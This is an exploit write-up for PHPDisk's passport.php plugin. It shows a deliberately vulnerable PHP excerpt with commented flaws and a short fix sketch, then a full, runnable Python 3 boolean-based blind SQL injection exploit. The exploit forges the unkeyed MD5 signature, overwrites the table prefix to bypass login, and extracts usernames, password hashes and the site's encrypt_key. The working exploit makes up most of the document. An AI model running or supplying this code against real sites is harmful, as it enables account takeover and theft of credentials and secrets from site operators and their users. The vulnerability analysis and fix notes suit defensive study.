PHPDisk blind SQL injection & arbitrary front-end user login

Source: Internet
Author: User

Code Review

File: plugins/phpdisk_client/passport.php

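<?php
// plugins/phpdisk_client/passport.php -- vulnerable excerpt.
//
// Reconstructed from the garbled one-line listing (identifier case, the lost
// "==" and the missing parentheses restored); the logic is unchanged and
// deliberately left vulnerable so the exploit below can be read against it.
// The numbered comments mark the flaws; a fix is sketched at the end.

// [1] The raw query string is base64-decoded and passed to parse_str() with
//     no result array, so every key in the decoded string becomes a variable
//     in this scope.  A request can therefore set -- or overwrite -- $action,
//     $username, $password, $sign and, crucially, the table prefix $tpf.
$str = $_SERVER['QUERY_STRING'];
if ($str) {
    parse_str(base64_decode($str)); // trigger point
} else {
    exit('error param');
}

/* Superseded input handling; the values now come straight from parse_str():
$username = trim(gpc('username', 'G', ''));
$password = trim(gpc('password', 'G', ''));
$sign     = trim(gpc('sign', 'G', ''));
*/

// [2] The "signature" is an unkeyed MD5 over action.username.password.
//     Anyone can compute it, and it does not cover $tpf, so the check does
//     nothing to stop the prefix from being tampered with.
if ($sign != strtoupper(md5($action . $username . $password))) {
    exit('no data,code:2!');
}

$username = is_utf8() ? convert_str('gbk', 'utf-8', $username) : $username;

if ($action == 'passportlogin') {
    // [3] $tpf is interpolated into the statement unquoted and unescaped.
    //     With tpf = "pd_users WHERE 1 #" the query becomes
    //         select ... from pd_users WHERE 1 #users where username='...' ...
    //     i.e. the credential check is commented out and fetch_one_array()
    //     presumably hands back the first user row, logging the caller in as
    //     that user.  With tpf = "pd_users WHERE 1 AND (<cond>) #" the
    //     presence or absence of a row becomes a boolean oracle for blind
    //     extraction.  $username and $password are not escaped in this
    //     excerpt either (they were previously read through gpc(), above).
    $rs = $db->fetch_one_array("select userid,gid,username,password,email from {$tpf}users where username='$username' and password='$password' limit 1"); // $tpf overwritten via parse_str
    // ... remainder of the login handler is not part of this excerpt
}

// Fix sketch: parse_str(base64_decode($str), $p) into an array and read only
// the expected keys from $p; never take $tpf from the request; whitelist
// $action; sign every field with an HMAC under a server-side secret and
// compare with hash_equals(); bind $username/$password as query parameters.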


phpdisk.py exploit

 

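#!/usr/bin/env python3
# =============================================================================
#  Id     : phpdisk.py
#  Author : Yaseng [yaseng@uauc.net]
#
#  Boolean-based blind SQL injection PoC for PHPDisk,
#  plugins/phpdisk_client/passport.php (see the PHP excerpt on this page).
#
#  Why it works:
#    * passport.php feeds base64_decode($_SERVER['QUERY_STRING']) to
#      parse_str(), so every variable in that scope -- including the table
#      prefix $tpf -- can be set by the request.
#    * The "signature" is MD5(action . username . password) with no secret
#      and without $tpf, so it is trivially satisfied.
#    * $tpf is interpolated unescaped into
#          select ... from {$tpf}users where username='..' and password='..'
#      A tpf of  "pd_users WHERE 1 AND (<cond>) #"  rewrites it to
#          select ... from pd_users WHERE 1 AND (<cond>)
#      with the rest of the statement commented out.  The PoC treats a
#      response that does NOT contain "ssport Err" as "<cond> is true"
#      (presumably because a row was found and the login went through).
#
#  Ported to Python 3.  The original used urllib2, the removed md5 module,
#  print statements and an unused Windows-only msvcrt import, so it no longer
#  ran on any supported interpreter; it also crashed inside b() whenever a
#  request failed (get_data() returned 0 and .find() was called on it), and
#  silently produced truncated values when a character was outside its
#  search alphabet.
#
#  Usage: phpdisk.py http://target.example [userid]   (userid defaults to 1)
#  Only run against systems you are authorised to test.
# =============================================================================
import base64
import binascii
import hashlib
import sys
import urllib.request

PASSPORT_PATH = "/plugins/phpdisk_client/passport.php"

# Table prefix assumed by the payloads.  The original PoC hard-coded the
# PHPDisk default "pd_"; a target with another prefix needs this changed.
TABLE_PREFIX = "pd_"

# Substring of the failed-login response; its absence is the "true" branch of
# the boolean oracle.  Taken from the original PoC; adjust if the target
# localises the message.
ERROR_MARKER = "ssport Err"

# Alphabets the injected SELECTs are compared against, as in the original.
# NOTE(review): the username/password compares are not wrapped in BINARY(),
# so whether they are case-sensitive depends on the column collation --
# confirm before widening USERNAME_CHARSET with upper-case letters.
USERNAME_CHARSET = "0123456789abcdefghijklmnopqrstuvwxyz"
PASSWORD_CHARSET = "0123456789abcdef"  # the password column holds a hex MD5
ENCRYPT_KEY_CHARSET = ("0123456789"
                       "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                       "abcdefghijklmnopqrstuvwxyz")

# Upper bound (exclusive) of the length probe; the original tried 0..39.
MAX_LENGTH = 40

# MySQL hex literal for the string "encrypt_key" (pd_settings.vars lookup).
ENCRYPT_KEY_VAR_HEX = "0x" + binascii.hexlify(b"encrypt_key").decode("ascii")

# Module-level state filled in by main().  Every function below also accepts
# the value explicitly so the module can be imported and driven from code.
target = None  # full URL of passport.php on the target
uid = 1        # userid of the row to extract

BANNER = r'''
   ___  ___  ____  ____  ____  __      __   _  _
  / __)/ _ \(  _ \( ___)(  _ \(  )    /__\ ( \/ )
 ( (__( (_) ))(_) ))__)  )___/ )(__  /(__)\ \  /
  \___)\___/(____/(____)(__)  (____)(__)(__)(__)

  Name   : phpdisk blind sql injection exploit
  Author : Yaseng [yaseng@uauc.net]
  Usage  : phpdisk.py http://site  [userid]
'''


def cslogo():
    """Print the banner and usage line."""
    print(BANNER)


def msg(text, type=0):
    """Print a tagged status line.

    type 0 -> "[*]" (info), 1 -> "[+]" (success), anything else -> "[-]" (error).
    (The parameter name shadows the builtin; kept for compatibility.)
    """
    tag = {0: "[*]", 1: "[+]"}.get(type, "[-]")
    print(tag + text)


def get_data(url, timeout=10):
    """GET `url` and return the body as text, or None if the request failed.

    The body is decoded leniently: ERROR_MARKER is ASCII, so the page's real
    charset does not matter for the oracle.  Failures are reported instead of
    swallowed, because a missing response must never be read as a boolean
    result.
    """
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except (OSError, ValueError) as exc:
        # URLError/HTTPError/timeouts are OSError subclasses; ValueError is
        # raised for a malformed (e.g. scheme-less) URL.
        msg("request failed (%s): %s" % (url, exc), 2)
        return None


def b(url, retries=3):
    """Boolean oracle: True iff the response to `url` does NOT contain ERROR_MARKER.

    Transport failures are retried; if the page can never be fetched a
    RuntimeError is raised rather than guessing, since a single wrong bit
    corrupts every value extracted afterwards.
    """
    for _ in range(retries):
        body = get_data(url)
        if body is not None:
            return ERROR_MARKER not in body
    raise RuntimeError("no response from %s after %d attempts" % (url, retries))


def _sign(action, username, password):
    """Return the signature passport.php expects: upper-case MD5(action.username.password).

    There is no secret and the table prefix is not covered, which is why the
    tpf value can be tampered with freely.
    """
    data = (action + username + password).encode("utf-8")
    return hashlib.md5(data).hexdigest().upper()


def build_query(payload, username="1", password="1", action="passportlogin"):
    """Return the plaintext query string that carries `payload` as the tpf value."""
    return "username=%s&password=%s&action=%s&tpf=%s&sign=%s" % (
        username, password, action, payload, _sign(action, username, password))


def make_payload(payload, base_url=None):
    """Return the attack URL: base_url + "?" + base64(query string).

    passport.php base64-decodes the raw QUERY_STRING and hands it to
    parse_str(), so nothing is URL-encoded here.  `base_url` defaults to the
    module-level `target`; raises ValueError if neither is set.
    """
    base_url = target if base_url is None else base_url
    if base_url is None:
        raise ValueError("target URL not set")
    encoded = base64.b64encode(build_query(payload).encode("utf-8")).decode("ascii")
    return base_url + "?" + encoded


# Original (misspelt) name, kept for callers of the old script.
make_plyload = make_payload


def _hex_literal(ch):
    """MySQL hex literal for one character, e.g. 'a' -> 0x61 (no quoting needed in the payload)."""
    return "0x" + binascii.hexlify(ch.encode("utf-8")).decode("ascii")


def _condition_true(condition, base_url=None):
    """Ask the server whether the SQL boolean `condition` holds.

    A tpf of "<prefix>users WHERE 1 AND (<condition>) #" rewrites the login
    SELECT into "select ... from <prefix>users WHERE 1 AND (<condition>)"
    and comments out the remainder of the original statement.
    """
    return b(make_payload("%susers WHERE 1 AND (%s) #" % (TABLE_PREFIX, condition), base_url))


def _probe_length(length_select, base_url=None, max_length=MAX_LENGTH):
    """Return the value of the scalar subquery `length_select`, or None if it is not in [0, max_length)."""
    for n in range(max_length):
        if _condition_true("(%s) = %d" % (length_select, n), base_url):
            return n
    return None


def _probe_string(char_select_fmt, length, charset, base_url=None, label="value"):
    """Recover `length` characters one position at a time.

    `char_select_fmt` is a scalar subquery with a single %d placeholder for the
    1-based position.  A position matched by no character in `charset` is
    reported and recorded as "?" instead of being silently dropped (which
    shifted every later character in the original).
    """
    out = []
    for pos in range(1, length + 1):
        for ch in charset:
            cond = "(%s) = %s" % (char_select_fmt % pos, _hex_literal(ch))
            if _condition_true(cond, base_url):
                msg("%s [%d]:%s" % (label, pos, ch))
                out.append(ch)
                break
        else:
            msg("%s [%d]: no match in charset" % (label, pos), 2)
            out.append("?")
    return "".join(out)


def get_username(user_id=None, base_url=None, charset=USERNAME_CHARSET):
    """Extract the username of row `user_id` (default: module-level uid) from <prefix>users.

    Returns "" if the length probe finds nothing.
    """
    user_id = int(uid if user_id is None else user_id)
    table = TABLE_PREFIX + "users"
    msg("get username ...")
    length = _probe_length(
        "SELECT LENGTH(username) FROM %s WHERE userid=%d" % (table, user_id), base_url)
    if length is None:
        msg("username length not found in 0..%d" % (MAX_LENGTH - 1), 2)
        return ""
    msg("username length:%d" % length, 1)
    username = _probe_string(
        "SELECT substr(username,%%d,1) FROM %s WHERE userid=%d" % (table, user_id),
        length, charset, base_url, label="username")
    msg("username:" + username, 1)
    return username


def get_password(user_id=None, base_url=None, charset=PASSWORD_CHARSET):
    """Extract the 32-character MD5 password hash of row `user_id` from <prefix>users.

    The length is not probed: the column is assumed to hold a hex MD5, as in
    the original PoC.
    """
    user_id = int(uid if user_id is None else user_id)
    table = TABLE_PREFIX + "users"
    msg("get password ...")
    password = _probe_string(
        "SELECT substr(password,%%d,1) FROM %s WHERE userid=%d" % (table, user_id),
        32, charset, base_url, label="password")
    msg("password:" + password, 1)  # the original mislabelled this line "username:"
    return password


def get_encrypt_key(base_url=None, charset=ENCRYPT_KEY_CHARSET):
    """Extract the `encrypt_key` setting from <prefix>settings (case-sensitive via BINARY()).

    Not called by main(); kept from the original PoC for manual use.
    Returns "" if the length probe finds nothing.
    """
    table = TABLE_PREFIX + "settings"
    where = "FROM %s WHERE vars=%s" % (table, ENCRYPT_KEY_VAR_HEX)
    msg("get encrypt_key ...")
    length = _probe_length("SELECT LENGTH(value) " + where, base_url)
    if length is None:
        msg("encrypt_key length not found in 0..%d" % (MAX_LENGTH - 1), 2)
        return ""
    msg("encrypt_key length:%d" % length, 1)
    key = _probe_string("SELECT BINARY(substr(value,%d,1)) " + where,
                        length, charset, base_url, label="key")
    msg("encrypt_key:" + key, 1)
    return key


def _normalise_site(site):
    """Prepend http:// to a bare host and strip a trailing slash.

    urlopen() rejects scheme-less URLs, so the original usage example
    ("phpdisk.py www.example.com") could never have worked.
    """
    if "://" not in site:
        site = "http://" + site
    return site.rstrip("/")


def main(argv=None):
    """Command-line entry point: ``phpdisk.py site [userid]``.

    Returns the process exit status: 0 on success, 1 when passport.php is
    unreachable or nothing could be extracted, 2 on a usage error.
    """
    global target, uid
    args = sys.argv[1:] if argv is None else list(argv)
    cslogo()
    if not args:
        return 2
    site = _normalise_site(args[0])
    try:
        uid = int(args[1])
    except (IndexError, ValueError):
        uid = 1  # same default as the original PoC
    target = site + PASSPORT_PATH
    msg("exploit:" + site)
    # Reachability check: a bare GET makes passport.php answer 'error param',
    # which is a non-empty body; None/"" means the script is not there.
    if not get_data(target):
        msg("vulnerability not present (passport.php unreachable)", 2)
        return 1
    username = get_username()
    if not username:
        return 1
    password = get_password()
    if len(password) == 32 and "?" not in password:
        msg("Succeed: username:%s  password:%s" % (username, password), 1)
        return 0
    return 1


if __name__ == "__main__":
    sys.exit(main())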

Demo



 
